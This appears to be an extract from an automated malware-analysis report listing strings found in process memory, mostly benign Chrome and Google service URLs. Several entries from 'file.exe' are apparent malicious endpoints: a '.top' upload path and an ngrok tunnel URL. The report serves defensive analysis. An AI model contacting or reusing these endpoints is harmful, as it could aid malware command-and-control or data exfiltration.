Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000004.00000002.2120787180.0000661800634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000004.00000002.2120787180.0000661800634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117f
Source: chrome.exe, 00000004.00000002.2118830848.00006618000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2120817545.0000661800658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
Source: file.exe, 00000000.00000003.2046769091.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fvtekk5pn.top/v1/upload.
Source: chrome.exe, 00000004.00000002.2118685419.0000661800082000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: file.exe, 00000000.00000003.1694633730.0000000007512000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: file.exe, 00000000.00000003.1964347823.0000000000A49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347
Source: file.exe, 00000000.00000003.1964328077.0000000000A3E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1964347823.0000000000A49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17320193474fd4
Source: file.exe, 00000000.00000003.1694633730.0000000007512000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000004.00000002.2121967344.000066180097C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000004.00000002.2121967344.000066180097C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certsf
Source: chrome.exe, 00000004.00000002.2122030023.00006618009D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000004.00000002.2122030023.00006618009D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/a
Source: Amcache.hve.13.dr String found in binary or memory: http://upx.sf.net
Source: chrome.exe, 00000004.00000002.2122170309.0000661800A40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000004.00000002.2120689939.000066180060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000004.00000002.2118744306.000066180009C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000004.00000002.2119892210.00006618003C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000004.00000002.2118559384.000066180000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000004.00000002.2122610142.0000661800BB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000004.00000002.2121967344.000066180097C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2120844041.0000661800664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122246127.0000661800A80000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 00000004.00000002.2122610142.0000661800BB4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000004.00000002.2121617333.0000661800874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000004.00000002.2121617333.0000661800874000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession#z
Source: chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000004.00000002.2122096377.0000661800A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000004.00000002.2118772580.00006618000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000004.00000002.2118772580.00006618000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000004.00000002.2118772580.00006618000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000004.00000002.2118744306.000066180009C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000004.00000002.2118744306.000066180009C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxABf
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000004.00000002.2121617333.0000661800874000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: file.exe, 00000000.00000003.1694633730.0000000007512000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: file.exe, 00000000.00000003.1694633730.0000000007512000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108394599.000066180081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108347657.000066180038C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2107918194.000066180038C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000004.00000002.2121192542.0000661800724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2120291725.00006618004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.2120689939.000066180060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000004.00000002.2120689939.000066180060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icoeb
Source: chrome.exe, 00000004.00000002.2122712610.0000661800C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000004.00000002.2122712610.0000661800C2C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000004.00000002.2122780689.0000661800C50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000004.00000002.2122780689.0000661800C50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000004.00000002.2122780689.0000661800C50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000004.00000002.2122802778.0000661800C60000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000004.00000003.2108774543.0000661800CD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000004.00000002.2120787180.0000661800634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000004.00000002.2122145837.0000661800A28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2121847815.0000661800914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122197081.0000661800A5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122030023.00006618009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2121421201.00006618007DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000004.00000002.2122197081.0000661800A5C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enf
Source: chrome.exe, 00000004.00000003.2110975346.0000661800ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122989816.0000661800CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2121704120.00006618008B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2108774543.0000661800CD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000004.00000002.2131598828.00006A940078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2092695940.00006A9400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092977679.00006A940039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2131730773.00006A940080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000004.00000002.2131598828.00006A940078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2092695940.00006A9400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092977679.00006A940039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2131730773.00006A940080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000004.00000002.2131598828.00006A940078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000004.00000002.2131598828.00006A940078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2093540690.00006A9400684000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000004.00000003.2092695940.00006A9400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2092977679.00006A940039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2131730773.00006A940080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000004.00000002.2119243982.000066180020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000004.00000002.2118559384.000066180000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000004.00000002.2122872794.0000661800C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g1
Source: chrome.exe, 00000004.00000003.2088871671.00006000002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2088848567.00006000002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000004.00000002.2118801999.00006618000DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/c
Source: chrome.exe, 00000004.00000002.2122638312.0000661800BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2120876763.0000661800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098191243.0000661800490000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2121142561.0000661800700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2118559384.000066180000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000004.00000002.2122402420.0000661800B10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000004.00000002.2121967344.000066180097C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000004.00000002.2121967344.000066180097C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bf
Source: chrome.exe, 00000004.00000002.2121967344.000066180097C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000004.00000002.2121192542.0000661800724000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000004.00000002.2119180830.00006618001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000004.00000002.2120787180.0000661800634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2122780689.0000661800C50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000004.00000002.2119359539.00006618002A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/368855.)
Source: file.exe, 00000000.00000003.1694633730.0000000007512000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe, 00000000.00000003.1694633730.0000000007512000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe, 00000000.00000003.1694633730.0000000007512000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000004.00000002.2119609148.0000661800328000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000004.00000003.2098191243.0000661800490000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000004.00000002.2120737246.0000661800629000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.2098421462.000066180061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
